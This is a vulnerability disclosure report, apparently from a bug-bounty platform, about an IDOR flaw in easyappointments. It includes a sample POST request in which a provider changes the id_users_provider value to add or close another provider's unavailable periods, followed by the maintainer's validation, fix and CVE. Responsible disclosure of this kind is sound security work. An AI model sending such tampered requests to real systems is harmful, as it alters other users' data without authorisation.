We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

IDOR can make attackers add or close others' unavaiable in alextselegidis/easyappointments

Valid

Reported on

Jun 5th 2023

both user1 and user2 are Providers

1 user1 login and add unavaiable

2 request can be like

POST /index.php/backend_api/ajax_save_unavailable HTTP/1.1
.....
csrfToken=d0a4805b08a205bfd5cf112137b21585&unavailable=%7B%22start_datetime%22%3A%222023-06-07+01%3A45%22%2C%22end_datetime%22%3A%222023-06-07+02%3A45%22%2C%22notes%22%3A%22%22%2C%22id_users_provider%22%3A%229%22%7D

3 id_users_provider%22%3A%229%22%7D means id_users_provideer=9

4 we change the id as 10, i..e user2

5 send the request, then we find that user2 owns an unavailable

Impact

attacks can close and add others's unavailable

We are processing your report and will contact the alextselegidis/easyappointments team within 24 hours. 4 months ago
lujiefsi modified the report
4 months ago
We have contacted a member of the alextselegidis/easyappointments team and are waiting to hear back 3 months ago
lujiefsi modified the report
3 months ago
lujiefsi
3 months ago

Researcher

any update for this issuse?

lujiefsi
2 months ago

Researcher

any update?

Alex Tselegidis validated this vulnerability 2 months ago
lujiefsi has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Alex Tselegidis marked this as fixed in 1.5.0 with commit b37b46 2 months ago
Alex Tselegidis has been awarded the fix bounty
This vulnerability has been assigned a CVE
Alex Tselegidis published this vulnerability 2 months ago
to join this conversation